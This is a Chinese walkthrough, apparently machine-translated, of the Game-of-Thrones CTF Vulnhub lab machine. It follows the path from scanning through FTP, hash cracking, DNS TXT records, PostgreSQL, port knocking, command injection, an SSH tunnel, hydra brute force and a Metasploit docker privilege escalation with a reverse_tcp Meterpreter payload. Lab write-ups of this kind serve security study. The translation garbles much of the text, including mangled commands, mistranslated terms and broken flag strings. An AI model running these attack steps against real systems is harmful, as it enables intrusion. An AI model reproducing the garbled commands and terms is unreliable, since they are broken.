thrones Game-of-Thrones-CTF-1.0靶机实战演练

0×01前言

这部无人机的主题是《权力的游戏》，难度在中高级。目标是获得七面旗和四面额外旗，包括三面秘密旗和一面最终旗。需要一点《权力的游戏》的知识。如果你根本没看过也没关系，但是作为一个黑客，这部史诗级的电视剧还是推荐你去看。在拿旗的过程中，你需要一遍又一遍的看地图。地图会给你很多信息，你也要仔细阅读每一个提示。

0×02环境配置

目标机下载地址:https://www.vulnhub.com/entry/game-of-thrones-ctf-1,201/我用的是VMware，虚拟机NAT连接，目标机自动获取IP本次实战:目标机IP: 192.168.128.137原生IP: 192.168.128.106

0×03实战演习

namp开路，IP发现:

找到目标IP并继续端口服务检测:

发现端口80运行web service，我们在浏览器中打开，会循环播放正确游戏的主题曲。一边听歌，一边挖旗然后查页面源码。这就是挖网漏洞的套路

这是关于无人机的一些信息，包括目标、注意事项和提示。然后用dirb扫描web目录

有一个robots.txt文件。打开后发现里面有几个目录

打开:http://192 . 168 . 128 . 137/secret-island/，是小指的图片，找到了地图链接

打开地图后，可以找到所有旗帜的位置，也可以看到相应的服务。这是重要的信息，下面的探索一定要以这张地图为基础

打开名为/直接访问国王登陆/的目录

是乔佛里的照片，没有发现敏感信息。根据robots.txt文件的提示，打开http://192 . 168 . 128 . 137/the-tree/，挂掉打嗝时抢包的代理，在请求头添加User-Agent:三眼乌鸦，发送数据包

这只是斯诺的一张照片，但仍然没有有用的信息。dirb之前扫描了一下目录，发现了一个奇怪的目录/h/i/d/d/e/n/。打开看看

看了一下源代码，找到了一个密码:a _ verysmalmancancastaveryriglarshadw。根据提示，这个地方是多恩，因为多恩的领主是oberynmartell，那么估计这就是登录密码。看地图，发现多恩对应ftp

使用ftp连接到我们找到的用户名和密码

找到两个文件，通过ftp下载，打开其中一个，下面是一个哈希加密密码，需要破解

用开膛手约翰解密这个文件，找到密码(这个a.txt就是上面的hash.txt)

John - format = dynamic_2008 a.txt

使用mcrypt解密我们在ftp服务器中找到的加密文件

mcrypt -d the_wall.txt.nc

文件已经被解密，保存它们并添加到/etc/hosts中，我们现在可以在文件中找到这个字段:临冬城7王国. ctf并打开链接

我们使用上面找到的用户名和密码登录，看到一个包含两个图像的页面，这两个图像是雪和北旗

看了一下源代码，找到了第一面旗帜:你征服了北方的王国。这是你的第二面国旗！639 BAE 9 AC 6 B3 E1 a 84 cebb 7b 403297 b 79

下载了北方旗帜，用文字打开后，发现最后这句话:Timef 0 rconqu 3 rs文字应该被要求进入铁群岛要塞”——on grey joy

这意味着我们的TXT记录包含一些敏感信息，所以我使用nslookup来检查TXT记录。我们必须对域名进行一些修改才能使其生效，并找到了第二个标志

command:nslookup-q = txttimef 0 rconqu3rs . 7 kingdom . CTF 192 . 168 . 128 . 137

text = "你征服了铁群岛王国国旗:5e 93 de 3e fa 544 e 85 DCD 6311732d 28 f 95

现在，我们将新域名添加到/etc/hosts，并打开上面TXT记录中的链接

http://storm lands . 7 kings . CTF:10000

我们使用TXT记录中的用户名和密码登录

使用此用户/密码组合进入:aryastark/n3dd L3 _ 1s _ a _ g00d _ sword #！

有什么问题就看看网站

使用文件管理器模块打开文件管理器并访问其中的文件

浏览器必须执行Java模块才能打开文件管理器。卡住很久了，用IE解决了

在/home/aryastark文件夹中，找到了一个名为flag.txt的文件

下载文件并在主机中打开，找到第三个标志:

这是你的旗帜:8fc 42 c 6 ddf 9966 db 3b 09 e 84365034357

当nmap扫描时，它知道无人机正在运行postgresql。现在这个提示是访问数据库，并使用上面文件中提供的用户名和密码进行连接

psql-h 192 . 168 . 128 . 137-u robin arryn-d mountains and evale

找到一个名为flag的表，打开它，发现一个base64编码的字符串

我们解码了base64编码字符串，找到了第四个标志:

这是您的旗帜:bb3 AEC 0 fdcdbc 2974890 f 805 c 585d 432

检查其他表格，以防止任何有用的信息。在其中一张桌子上，我们找到了几个名字

从aryas_kill_list中选择*

在arya_kill_list中，似乎可以使用这些名称

在数据库中搜索，我们发现了一个由rot16编码的字符串。

从braavos_book中选择*

1 |布拉佛斯城是一个非常特别的地方。离这不远。

2 |“只有一个神，他的名字叫死神。我们对死亡只说一句话:今天不行”——西利欧·佛瑞尔

3 |布拉佛斯有很多稀奇古怪的建筑。布拉佛斯的铁银行，黑白之家，布拉佛斯的泰坦等等。

4 |“男教女。-梵拉·多赫里斯-所有人都必须服役。最重要的是“无面者”——加恩·哈尔

6 |“女孩没有名字”——艾莉亚·史塔克

7 |布拉佛斯市由一个选举产生的职位——海王统治。

8 |“那个人的命不是你拿的。一个女孩偷了多面神的东西。现在欠了一笔债”——加恩·哈尔

9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo。ro gkxdc iye dy snoxdspi KC yxo yp iyeb usvv vscd。covomd SD lkcon yx drsc lyyu ' c vycd zkqo xew lob。dro nkdklk co dy myxxomd gsvv lo lbkkfyc kxn iyeb zccgybn gsvv lo:FkvkbWybqrevsc

现在，在转换了这段rot16代码后，我们找到了数据库的名称和密码，并且还给了我们一个使用上表中找到的用户名的提示。

http://www.rot13.com/

多面的上帝希望你改变你的面貌。他想让你确认是你的杀手之一。根据这本书丢失的页码选择它。要连接的数据库将是braavos，您的密码将是:ValarMorghulis

在枚举了用户名之后，我们发现TheRedWomanMelisandre就是用户名

登录后检查里面的数据，检查发现坦普尔发现了第五面旗帜:

3f 82 c 41 a 70 A8 b 0 cfec 9052252d 9 FD 721

看了地图，发现我们到达的王国在地图上显示的imap服务中，但是这个港口并没有开放。现在我们用之前找到的数字敲门，试图让无人机打开143号口

敲门192 . 168686868686

因为我的kali敲不开，只好换了一个kali虚拟机，最后敲了一下

现在我们使用nmap扫描来检查服务器上是否有一个新端口打开，我们发现运行imap的端口143是打开的

nmap -p- 192.168.128.137

使用netcat连接到它，我们使用之前找到的用户名和密码。

数控192.168.128.137 143

在收件箱中，我们找到了我们的第六个标志，我们还得到使用端口1337的提示，并给出了登录用户名和密码

我们登录网站，发现是git网站。

兰尼斯特兰尼斯特三世！

通过漏洞扫描后，发现这个网站有注入漏洞的命令

标题下的编码信息为十六进制，解码为/home/tyrionnanister/check point . txt。

在一些命令注入之后，发现了以下信息

第七个标志:c8d 46d 341 bea 4 FD 5 BFF 866 a 65 ff 8 AEA 9，SSH的用户名和密码:

用户:daenerystargaryen

密码:。Dracarys4thewin。

Ssh登录:(xshell)

通过搜索，我找到了两个文件，分别叫digger.txt和checkpoint.txt，checkpoint.txt包含一个提示:通过ip 172.25.0.2的ssh登录，使用文件digger.txt中的字典。

我们通过ssh下载了digger.txt到我们的系统。

scp digger . txt root @ 192 . 168 . 1 . 116:

我们使用本地隧道将其绑定到我们的端口2222。

ssh DAE nerystargaryen @ 192 . 168 . 128 . 137-L 2222:172 . 25 . 0 . 2:22-N

现在我用hydra通过ssh登录，用root做用户名，用digger.txt文件爆密码

找到了密码“Dr4g0nGl4ss！”带根

我们使用这个密码通过ssh登录，我们使用localhost连接，因为我们已经完成了ssh本地隧道的绑定

查看文件，我们发现了一个秘密标志，我们还获得了一个用户名和密码，可以通过ssh登录

主机的ssh:

branstark/Th3_Thr33_Ey3d_Raven

这是您的旗帜:A8 db 1d 82 db 78 ed 452 ba 0882 FB 9554 fc 9

我们使用这个用户名和密码通过ssh使用metasploit进行连接

msf>。使用辅助/scanner/ ssh / ssh_login msf辅助(scanner/ ssh / ssh_login)>;设置rhosts 192.168.128.137 msf辅助(scanner / ssh / ssh_login)>;设置用户名branstark msf辅助(scanner / ssh / ssh_login)>;设置密码Th3_Thr33_Ey3d_Raven msf辅助(scanner / ssh / ssh_login)>;跑

在搜索了一些版本信息和授权脚本后，我注意到这个服务器是基于docker的，所以我在metasploit中使用了docker授权脚本

msf>。使用exploit/Linux/local/docker _ daemon _ privilege proliferation MSF exploit(Linux/local/docker _ daemon _ privilege proliferation)>:set lhost 192 . 168 . 128 . 137 MSF exploit(Linux/local/docker _ daemon _ privilege proliferation)>;设置有效负载Linux/x86/meter preter/reverse _ TCP MSF漏洞(Linux/local/docker _ daemon _ privilege proliferation)>设置会话1 msf漏洞(Linux/local/docker _ daemon _ privilege proliferation )>;跑

现在我在授权后获得了会话，现在我检查我是根

查看文件，找到一个名为final_battle的受密码保护的文件和一个告诉我们如何找到密码的文件。它包含一些伪代码，并告诉我们如何使用我们找到的秘密标志来找到密码

通过伪代码，找到了另一个标志:3f 82 c 41 a 70 A8 b 0 cfec 9052252d 9 FD 721

现在我有了两个秘密旗帜。通过文件搜索，我在音乐文件中找到了一个秘密标志。我找到了两个音乐文件，用exiftool找到了mp3文件中包含的秘密标志

exiftool game _ of _ thrones.mp3

发现三个secrect flags:8 BF 8854 Bebe 108183 caeb 845 c 7676 AE 43 f 82 c 41 a 70 A8 b 0 cfec 9052252d 9 FD 721 A8 db 1d 82 db 78 ed 452 ba 0882 FB 9554 fc 9

将伪代码写成python代码: